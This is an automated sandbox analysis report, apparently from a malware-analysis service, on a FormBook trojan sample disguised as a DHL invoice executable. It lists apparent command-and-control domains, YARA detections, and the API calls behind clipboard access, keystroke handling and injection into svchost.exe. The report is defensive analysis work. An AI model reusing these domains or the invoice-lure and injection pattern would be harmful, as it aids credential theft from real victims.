Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crucka.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crucka.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crucka.xyz/jd21/www.freyja.info
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crucka.xyzReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.freyja.info
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.freyja.info/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.freyja.info/jd21/www.batremake.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.freyja.infoReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gbqspj.club
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gbqspj.club/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gbqspj.club/jd21/www.mantapnagita777.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gbqspj.clubReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ilovetvs.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ilovetvs.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ilovetvs.com/jd21/www.bougeefilth.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ilovetvs.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kapten69pola.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kapten69pola.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kapten69pola.xyz/jd21/www.tyumk.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kapten69pola.xyzReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kjsdhklssk73.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kjsdhklssk73.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kjsdhklssk73.xyz/jd21/www.arthemis-168bet.site
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kjsdhklssk73.xyzReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mantapnagita777.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mantapnagita777.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mantapnagita777.com/jd21/www.kapten69pola.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mantapnagita777.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.00000000078E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.350006795.00000000078F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.869194618.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.350006795.0000000007972000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868840236.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349305261.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349644935.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000003.00000002.869588514.00000000078E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.350006795.00000000078F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.869194618.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.350006795.0000000007972000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868840236.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349305261.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349644935.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000003.00000002.868840236.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349305261.000000000260E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerxe
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thepowerofzeus.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thepowerofzeus.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thepowerofzeus.com/jd21/www.alivioquantico.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thepowerofzeus.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tyumk.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tyumk.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tyumk.xyz/jd21/www.amsya.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tyumk.xyzReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uhug.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uhug.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uhug.xyz/jd21/www.crucka.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uhug.xyzReferer:
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012BEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_012BEAFF

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012BED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_012BED6A

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

0_2_012BEAFF

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012AAB9C GetKeyState,GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_012AAB9C

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012D9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_012D9576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe PID: 2412, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 236, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cscript.exe PID: 1368, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_22b1eab7-2
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_a398b267-a
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_0ace506a-3
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_206c2ff5-4

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A350 NtCreateFile,	2_2_0041A350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A400 NtReadFile,	2_2_0041A400
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A480 NtClose,	2_2_0041A480
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A530 NtAllocateVirtualMemory,	2_2_0041A530
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A47A NtClose,	2_2_0041A47A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00730078 NtResumeThread,LdrInitializeThunk,	2_2_00730078
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00730048 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_00730048
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007300C4 NtCreateFile,LdrInitializeThunk,	2_2_007300C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072F900 NtReadFile,LdrInitializeThunk,	2_2_0072F900
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072F9F0 NtClose,LdrInitializeThunk,	2_2_0072F9F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FAE8 NtQueryInformationProcess,LdrInitializeThunk,	2_2_0072FAE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_0072FAD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FB68 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_0072FB68
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FBB8 NtQueryInformationToken,LdrInitializeThunk,	2_2_0072FBB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FC60 NtMapViewOfSection,LdrInitializeThunk,	2_2_0072FC60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FC90 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_0072FC90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FDC0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_0072FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FD8C NtDelayExecution,LdrInitializeThunk,	2_2_0072FD8C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_0072FED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FEA0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_0072FEA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FFB4 NtCreateSection,LdrInitializeThunk,	2_2_0072FFB4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00730060 NtQuerySection,	2_2_00730060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0073010C NtOpenDirectoryObject,	2_2_0073010C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007301D4 NtSetValueKey,	2_2_007301D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007307AC NtCreateMutant,	2_2_007307AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00730C40 NtGetContextThread,	2_2_00730C40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007310D0 NtOpenProcessToken,	2_2_007310D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00731148 NtOpenThread,	2_2_00731148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072F8CC NtWaitForSingleObject,	2_2_0072F8CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00731930 NtSetContextThread,	2_2_00731930
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072F938 NtWriteFile,	2_2_0072F938
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FA50 NtEnumerateValueKey,	2_2_0072FA50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FA20 NtQueryInformationFile,	2_2_0072FA20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FAB8 NtQueryValueKey,	2_2_0072FAB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FB50 NtCreateKey,	2_2_0072FB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FBE8 NtQueryVirtualMemory,	2_2_0072FBE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FC48 NtSetInformationFile,	2_2_0072FC48
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FC30 NtOpenProcess,	2_2_0072FC30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FD5C NtEnumerateKey,	2_2_0072FD5C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00731D80 NtSuspendThread,	2_2_00731D80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FE24 NtWriteVirtualMemory,	2_2_0072FE24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FF34 NtQueueApcThread,	2_2_0072FF34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FFFC NtCreateProcessEx,	2_2_0072FFFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038A036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,	2_2_0038A036
